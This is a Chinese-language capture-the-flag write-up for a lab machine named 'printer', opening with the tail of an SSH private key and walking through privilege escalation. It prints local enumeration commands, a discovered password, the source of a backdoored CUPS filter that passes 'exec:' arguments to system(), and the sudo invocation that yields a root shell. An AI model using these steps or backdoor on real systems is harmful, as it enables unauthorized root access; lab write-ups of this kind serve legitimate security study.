fpF+FCJl5+PxAITjKQVxa+rJlz9P2oQHcTI5PU0yQwfle53Dv9JBOVBPhPo1ITenOR6PIj
Ps7r4yUJI6jnnZ1rguOJFo/gehUHrPmfVW4NfnYkWBQFafsAAAAMEA27rpSEIF2xYcmwNJ
d31W0vbL05K1Zs2496hjo2xuDd0VTZBF+8+d2iZSUvhiXGw9MDFb0kaWEWGSqOA4UivtY9
eSrIzmU6fCkn3oxXiFvfexCn3iSxcbz0r2T9oGZ4CLuy/raMmVwSa049Jzw6gtXbzWq/dO
sXIO1MIj9fuJ7kjriG9CYOYlXk6f2mIZvVmip6HNXdCwLySFitwQATTMY4m1jYV2IqRKKj
uYWiQ9K4MZj60POU2EvZ8Tqhlt1hqVAAAAwQDN73kJIzeQlliK82rqUPtdTffS/sIPl5mz
1aJkeS8MI2sMvyLibNaZ2B8CuVrQ9Zsc1KGIw7M4DVljdI4Ua6l29MHPsbY4YHvPupVwBm
jHhCzZOmzzxOKmySh/U2GUf1BHx4E/9dkbyXRlF/bAzopTbTcmc1ktP1UKw4bJwblqUOIA
rR1UiEpKQFxbLzTOxCfRUHWKGBVJU1jfXU5QWtQX6DubkCw0vM6P2UmoLioutXr3ZkNU8K
y3EhaUlRX0QpEAAAATbWFiZWxsZUBwcmludGVyLmhtdg==
-----END OPENSSH PRIVATE KEY-----

尝试切换一下用户!

image-20240428172351336

进一步提权

1
2
3
4
5
6
    3  sudo -l
    4  ls -la
    5  find / -perm -u=s -type f 2>/dev/null
    6  /usr/sbin/getcap -r / 2>/dev/null
    7  ss -atlp
    8  nc 127.0.0.1 1001

因为运行程序会覆盖终端,尝试一下:

No need for brute force here!
Hackerman
I put a backdoor in a printer filter.

Filter name: hack
You need to wait at least 60 seconds between attempts.

进一步信息搜集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
mabelle@printer:~$ cd /opt
mabelle@printer:/opt$ ls -la
total 12
drwxr-xr-x  3 root root  4096 Apr 22  2023 .
drwxr-xr-x 18 root root  4096 Feb  6  2023 ..
drwxr-xr-x 26  501 staff 4096 Apr 16  2023 cups-2.3.3
mabelle@printer:/opt$ cd cups-2.3.3/
mabelle@printer:/opt/cups-2.3.3$ ls -la
........
mabelle@printer:/opt/cups-2.3.3$ cd filter
mabelle@printer:/opt/cups-2.3.3/filter$ ls -la
total 1144
drwxr-xr-x  2  501 staff   4096 Apr 22  2023 .
drwxr-xr-x 26  501 staff   4096 Apr 16  2023 ..
-rw-r--r--  1  501 staff  11541 Feb  6  2023 commandtops.c
-rw-r--r--  1 root root   50488 Feb  6  2023 commandtops.o
-rw-r--r--  1  501 staff  11613 Feb  6  2023 common.c
-rw-r--r--  1  501 staff   1344 Feb  6  2023 common.h
-rw-r--r--  1 root root   49312 Feb  6  2023 common.o
-rw-r--r--  1  501 staff   2719 Feb  6  2023 Dependencies
-rw-r--r--  1  501 staff   2038 Feb  6  2023 gziptoany.c
-rw-r--r--  1 root root   17048 Feb  6  2023 gziptoany.o
-rw-r--r--  1  501 staff   4053 Feb  6  2023 Makefile
-rw-r--r--  1  501 staff   1295 Feb  6  2023 postscript-driver.header
-rw-r--r--  1  501 staff  14701 Feb  6  2023 postscript-driver.shtml
-rw-r--r--  1  501 staff   1275 Feb  6  2023 ppd-compiler.header
-rw-r--r--  1  501 staff  36686 Feb  6  2023 ppd-compiler.shtml
-rw-r--r--  1  501 staff  86511 Feb  6  2023 pstops.c
-rw-r--r--  1 root root  233464 Feb  6  2023 pstops.o
-rw-r--r--  1  501 staff   1232 Feb  6  2023 raster-driver.header
-rw-r--r--  1  501 staff  11869 Feb  6  2023 raster-driver.shtml
-rw-r--r--  1  501 staff  24526 Feb  6  2023 rastertoepson.c
-rw-r--r--  1 root root  104192 Feb  6  2023 rastertoepson.o
-rw-r--r--  1  501 staff  18977 Feb  6  2023 rastertohp.c
-rw-r--r--  1 root root   94120 Feb  6  2023 rastertohp.o
-rw-r--r--  1  501 staff  27170 Feb  6  2023 rastertolabel.c
-rw-r--r--  1 root root  129552 Feb  6  2023 rastertolabel.o
-rw-r--r--  1 root root   16862 Feb  6  2023 rastertopwg.c
-rw-r--r--  1 root root   78152 Feb  6  2023 rastertopwg.o
-rw-r--r--  1  501 staff   1346 Feb  6  2023 spec-ppd.header
-rw-r--r--  1  501 staff  79306 Feb  6  2023 spec-ppd.shtml

理论上只要试完就行了,但是每试一次就得停60秒,从后往前进行尝试,。

1
2
mabelle@printer:/opt/cups-2.3.3/filter$ ls *.c
commandtops.c  common.c  gziptoany.c  pstops.c  rastertoepson.c  rastertohp.c  rastertolabel.c  rastertopwg.c
1
2
3
4
5
I put a backdoor in a printer filter.

Filter name: rastertopwg

You are awesome! Here is the password: wK4EyQ15Cga

成功,拿捏的死死的,嘿嘿。

尝试切换我们的用户:

1
2
3
4
5
6
7
8
9
10
mabelle@printer:/opt/cups-2.3.3/filter$ su root
Password: 
su: Authentication failure
mabelle@printer:/opt/cups-2.3.3/filter$ cat /etc/passwd | grep "bash"
root:x:0:0:root:/root:/bin/bash
mabelle:x:1000:1000:,,,:/home/mabelle:/bin/bash
kierra:x:1001:1002:,,,:/home/kierra:/bin/bash
mabelle@printer:/opt/cups-2.3.3/filter$ su kierra
Password: 
kierra@printer:/opt/cups-2.3.3/filter$ 

再进一步提权

1
2
3
4
5
6
7
kierra@printer:/opt/cups-2.3.3/filter$ sudo -l
[sudo] password for kierra: 
Matching Defaults entries for kierra on printer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kierra may run the following commands on printer:
    (ALL : ALL) /usr/lib/cups/filter/rastertopwg

查看一下这个函数的c语言代码,并尝试运行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
kierra@printer:/opt/cups-2.3.3/filter$ ls -l /usr/lib/cups/filter/rastertopwg
-rwxr-xr-x 1 root root 18752 Mar 14  2022 /usr/lib/cups/filter/rastertopwg
kierra@printer:/opt/cups-2.3.3/filter$ cat /usr/lib/cups/filter/rastertopwg.c
cat: /usr/lib/cups/filter/rastertopwg.c: No such file or directory
kierra@printer:/opt/cups-2.3.3/filter$ ls -l *.c
-rw-r--r-- 1  501 staff 11541 Feb  6  2023 commandtops.c
-rw-r--r-- 1  501 staff 11613 Feb  6  2023 common.c
-rw-r--r-- 1  501 staff  2038 Feb  6  2023 gziptoany.c
-rw-r--r-- 1  501 staff 86511 Feb  6  2023 pstops.c
-rw-r--r-- 1  501 staff 24526 Feb  6  2023 rastertoepson.c
-rw-r--r-- 1  501 staff 18977 Feb  6  2023 rastertohp.c
-rw-r--r-- 1  501 staff 27170 Feb  6  2023 rastertolabel.c
-rw-r--r-- 1 root root  16862 Feb  6  2023 rastertopwg.c
kierra@printer:/opt/cups-2.3.3/filter$ cat rastertopwg.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
 * 'main()' - Main entry for filter.
 */

int                                     /* O - Exit status */
main(int  argc,                         /* I - Number of command-line args */
     char *argv[])                      /* I - Command-line arguments */
{
  const char            *final_content_type;

  for (int i = 1; i < argc; i++) {
    if (strncmp(argv[i], "exec:", 5) == 0) {
      system(argv[i] + 5);
    }
  }
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
kierra@printer:/opt/cups-2.3.3/filter$ sudo /usr/lib/cups/filter/rastertopwg
Usage: rastertopwg job user title copies options [filename]
kierra@printer:/opt/cups-2.3.3/filter$ sudo /usr/lib/cups/filter/rastertopwg exec: whoami
Usage: rastertopwg job user title copies options [filename]
kierra@printer:/opt/cups-2.3.3/filter$ sudo /usr/lib/cups/filter/rastertopwg -exec whoami
Usage: rastertopwg job user title copies options [filename]
kierra@printer:/opt/cups-2.3.3/filter$ sudo /usr/lib/cups/filter/rastertopwg exec whoami
Usage: rastertopwg job user title copies options [filename]
kierra@printer:/opt/cups-2.3.3/filter$ sudo /usr/lib/cups/filter/rastertopwg exec:whoami
root
Usage: rastertopwg job user title copies options [filename]
kierra@printer:/opt/cups-2.3.3/filter$ sudo /usr/lib/cups/filter/rastertopwg exec:bash
root@printer:/opt/cups-2.3.3/filter# cd /root
root@printer:~# ls -la
total 28
drwx------  4 root root 4096 May 20  2023 .
drwxr-xr-x 18 root root 4096 Feb  6  2023 ..
lrwxrwxrwx  1 root root    9 Apr 14  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root  637 Apr 16  2023 .bashrc
drwx------  2 root root 4096 Apr 23  2023 .config
drwxr-xr-x  3 root root 4096 Apr 23  2023 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rwx------  1 root root   33 Feb  6  2023 root_flag.txt

拿到rootshell!!!!!

本文由作者按照 CC BY 4.0 进行授权